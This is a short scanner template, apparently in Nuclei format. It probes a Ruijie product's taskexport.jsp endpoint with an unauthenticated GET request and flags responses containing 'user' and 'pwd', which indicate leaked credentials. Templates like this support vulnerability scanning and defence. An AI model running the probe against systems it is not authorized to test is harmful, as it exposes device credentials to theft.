id: XingwangRuijie-taskexport-Information-disclosure

info:
  name: XingwangRuijie-taskexport-Information-disclosure
  author: pitaya
  severity: info

http:
  - raw:
      - |+
        GET /dmb/out/taskexport.jsp?taskcode HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains_all(body, 'user', 'pwd')"